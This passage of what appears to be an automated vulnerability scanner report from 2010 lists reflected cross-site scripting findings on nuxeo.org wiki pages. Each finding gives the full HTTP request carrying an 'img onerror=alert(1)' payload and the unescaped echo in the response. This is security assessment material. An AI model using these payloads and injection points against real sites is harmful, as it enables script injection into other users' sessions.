<a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStartedf7c6d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E83bdae15118'>NuxeoDevGettingStartedf7c6d<img src=a onerror=alert(1)>83bdae15118</a>
...[SNIP]...

4.509. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d was submitted in the REST URL parameter 4. This input was echoed as 6520f<img src=a onerror=alert(1)>b3521d0e8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6520f<img%20src%3da%20onerror%3dalert(1)>b3521d0e8d/NuxeoProdSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:12 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12949
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main6520f%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb3521d0e8d/">Main6520f<img src=a onerror=alert(1)>b3521d0e8d</a>
...[SNIP]...

4.510. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1 was submitted in the REST URL parameter 4. This input was echoed as b6ecb"><img src=a onerror=alert(1)>3570ded39b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainb6ecb"><img%20src%3da%20onerror%3dalert(1)>3570ded39b1/NuxeoProdSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13028
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb6ecb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3570ded39b1/NuxeoProdSetup?format=xar&amp;name=Mainb6ecb"><img src=a onerror=alert(1)>3570ded39b1.NuxeoProdSetup&amp;pages=Mainb6ecb">
...[SNIP]...

4.511. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd was submitted in the REST URL parameter 5. This input was echoed as a30eb"><img src=a onerror=alert(1)>02bbce0edfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoProdSetupa30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:44 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoProdSetupa30eb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E02bbce0edfd?format=xar&amp;name=Main.NuxeoProdSetupa30eb"><img src=a onerror=alert(1)>02bbce0edfd&amp;pages=Main.NuxeoProdSetupa30eb">
...[SNIP]...

4.512. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c was submitted in the REST URL parameter 5. This input was echoed as 5f690<img src=a onerror=alert(1)>550971a196c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoProdSetup5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup5f690%3Cimg+src%3Da+onerror%3Dalert%281%29%3E550971a196c'>NuxeoProdSetup5f690<img src=a onerror=alert(1)>550971a196c</a>
...[SNIP]...

4.513. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519 was submitted in the REST URL parameter 4. This input was echoed as 95666<img src=a onerror=alert(1)>e1bfc44a519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519/QuickStart53 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:14 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12936
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main95666%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee1bfc44a519/">Main95666<img src=a onerror=alert(1)>e1bfc44a519</a>
...[SNIP]...

4.514. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33 was submitted in the REST URL parameter 4. This input was echoed as ce6a9"><img src=a onerror=alert(1)>8481e731c33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maince6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33/QuickStart53 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13002
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maince6a9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8481e731c33/QuickStart53?format=xar&amp;name=Maince6a9"><img src=a onerror=alert(1)>8481e731c33.QuickStart53&amp;pages=Maince6a9">
...[SNIP]...

4.515. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 was submitted in the REST URL parameter 5. This input was echoed as 7b69f"><img src=a onerror=alert(1)>e4df32fa359 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/QuickStart537b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12986
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/QuickStart537b69f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee4df32fa359?format=xar&amp;name=Main.QuickStart537b69f"><img src=a onerror=alert(1)>e4df32fa359&amp;pages=Main.QuickStart537b69f">
...[SNIP]...

4.516. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 was submitted in the REST URL parameter 5. This input was echoed as b1701<img src=a onerror=alert(1)>f3296b02031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/QuickStart53b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53b1701%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef3296b02031'>QuickStart53b1701<img src=a onerror=alert(1)>f3296b02031</a>
...[SNIP]...

4.517. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6 was submitted in the REST URL parameter 4. This input was echoed as 6f559<img src=a onerror=alert(1)>c8142c250a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6/RssFeeds HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12884
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main6f559%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec8142c250a6/">Main6f559<img src=a onerror=alert(1)>c8142c250a6</a>
...[SNIP]...

4.518. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf was submitted in the REST URL parameter 4. This input was echoed as 44b1d"><img src=a onerror=alert(1)>62f3be97fdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf/RssFeeds HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main44b1d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62f3be97fdf/RssFeeds?format=xar&amp;name=Main44b1d"><img src=a onerror=alert(1)>62f3be97fdf.RssFeeds&amp;pages=Main44b1d">
...[SNIP]...

4.519. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed was submitted in the REST URL parameter 5. This input was echoed as 54448"><img src=a onerror=alert(1)>a9dc78f1bed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/RssFeeds54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12934
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/RssFeeds54448%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea9dc78f1bed?format=xar&amp;name=Main.RssFeeds54448"><img src=a onerror=alert(1)>a9dc78f1bed&amp;pages=Main.RssFeeds54448">
...[SNIP]...

4.520. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f was submitted in the REST URL parameter 5. This input was echoed as 631e7<img src=a onerror=alert(1)>6c56452ca3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/RssFeeds631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12872
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds631e7%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6c56452ca3f'>RssFeeds631e7<img src=a onerror=alert(1)>6c56452ca3f</a>
...[SNIP]...

4.521. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524 was submitted in the REST URL parameter 4. This input was echoed as 2faea<img src=a onerror=alert(1)>80fd4319524 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524/Tags HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:21 GMT
